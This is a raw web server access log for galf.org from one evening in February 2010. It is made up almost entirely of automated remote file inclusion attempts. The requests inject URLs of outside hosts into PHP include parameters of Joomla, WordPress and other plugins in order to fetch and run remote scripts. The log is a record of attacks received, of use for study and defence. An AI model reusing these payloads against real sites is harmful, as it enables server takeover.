85.233.162.101 - - [28/Feb/2010:21:46:38 -0800] "GET /logs/access_091116.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:21:46:40 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:21:46:40 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:21:46:41 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:21:46:41 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.25.99 - - [28/Feb/2010:21:46:46 -0800] "GET /component/option,com_sitemap/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
85.12.33.30 - - [28/Feb/2010:21:46:46 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.25.99 - - [28/Feb/2010:21:46:54 -0800] "GET /logs//component/option,com_sitemap/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:21:47:42 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:21:47:42 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:21:49:24 -0800] "GET /logs/access_100201.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:21:50:26 -0800] "GET /logs/access_100201.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.0" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:21:50:26 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:21:50:26 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:51:04 -0800] "GET /logs/access_090907.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.114.35 - - [28/Feb/2010:21:51:48 -0800] "GET /logs/access_100215.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.80.193.27 - - [28/Feb/2010:21:51:54 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=45&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {A6C2D2E7-9A77-BDCE-2111-E835002CA674}; InfoPath.1)" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:21:52:23 -0800] "GET /logs/access_090824.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:21:53:16 -0800] "GET /common/db.php?commonpath=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:21:53:16 -0800] "GET /logs//common/db.php?commonpath=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:21:53:16 -0800] "GET /logs/access_100125.log//common/db.php?commonpath=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:53:27 -0800] "GET /s?=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:53:27 -0800] "GET /logs/s?=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:53:27 -0800] "GET /logs/access.log/s?=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:53:46 -0800] "GET /logs/s?=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:53:46 -0800] "GET /logs/access.log/s?=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.16 - - [28/Feb/2010:21:53:47 -0800] "GET /s?=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.103.72.130 - - [28/Feb/2010:21:55:16 -0800] "GET /logs/access_100222.log//common/db.php?commonpath=http://www.farmwinona.org/jackz/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:55:49 -0800] "GET /logs/access_091109.log/modifyform.html?code=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:55:49 -0800] "GET /modifyform.html?code=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:21:55:49 -0800] "GET /logs/modifyform.html?code=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:55:50 -0800] "GET /logs/access_100201.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:55:50 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:55:50 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:55:53 -0800] "GET /logs/access_100201.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:55:53 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:55:53 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:56:14 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:56:14 -0800] "GET /logs/access_100201.log///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:56:14 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:21:56:17 -0800] "GET /logs/access_100104.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:21:56:17 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:21:56:17 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:21:56:19 -0800] "GET /logs/access_100104.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:21:56:20 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:21:56:20 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:56:45 -0800] "GET /logs/access_100201.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:56:45 -0800] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:56:45 -0800] "GET /logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:57:17 -0800] "GET /logs/access_100208.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:21:57:38 -0800] "GET /logs/access_091221.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:21:57:41 -0800] "GET /logs/access_091221.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:21:58:04 -0800] "GET /logs/access_100208.log%20%20///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.worldcupadvice.com//images/ronaldinho.jpg/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:21:58:43 -0800] "GET /logs/access_091109.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:21:58:43 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.35.138 - - [28/Feb/2010:21:58:44 -0800] "GET /logs//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.35.138 - - [28/Feb/2010:21:58:44 -0800] "GET /include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.35.138 - - [28/Feb/2010:21:58:44 -0800] "GET /logs/access_091207.log%20%20//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.35.138 - - [28/Feb/2010:21:58:46 -0800] "GET /include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.35.138 - - [28/Feb/2010:21:58:46 -0800] "GET /logs//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.35.138 - - [28/Feb/2010:21:58:46 -0800] "GET /logs/access_091207.log%20%20//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:21:58:46 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:21:59:05 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:21:59:05 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:21:59:05 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:21:59:06 -0800] "GET /logs/access_100111.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:21:59:38 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:21:59:38 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:21:59:39 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:01:45 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:01:45 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:01:45 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:01:52 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:01:52 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:01:52 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:02:10 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:02:10 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:02:10 -0800] "GET /logs/access_091214.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:02:22 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:02:22 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:02:22 -0800] "GET /logs/access_091214.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:02:24 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:02:30 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:42 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:43 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:43 -0800] "GET /logs/access_100222.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:43 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:43 -0800] "GET /logs/access_091207.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:43 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.35.138 - - [28/Feb/2010:22:06:43 -0800] "GET /logs/access_100104.log//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.35.138 - - [28/Feb/2010:22:06:43 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:43 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:43 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:43 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:44 -0800] "GET /logs/access_091207.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:44 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:44 -0800] "GET /logs/access_100222.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.35.138 - - [28/Feb/2010:22:06:44 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.35.138 - - [28/Feb/2010:22:06:44 -0800] "GET /logs/access_100104.log//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:47 -0800] "GET /logs/access_091207.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:47 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:47 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:47 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:47 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:47 -0800] "GET /logs/access_100222.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:49 -0800] "GET /logs/access_090824.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:49 -0800] "GET /logs/access_090928.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:49 -0800] "GET /logs/access_091102.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:49 -0800] "GET /logs/access_091123.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:49 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:49 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:49 -0800] "GET /logs/access.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:50 -0800] "GET /logs/access.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:50 -0800] "GET /logs/access_091123.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:50 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:50 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:50 -0800] "GET /logs/access_090824.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:50 -0800] "GET /logs/access_091102.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:50 -0800] "GET /logs/access_090928.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
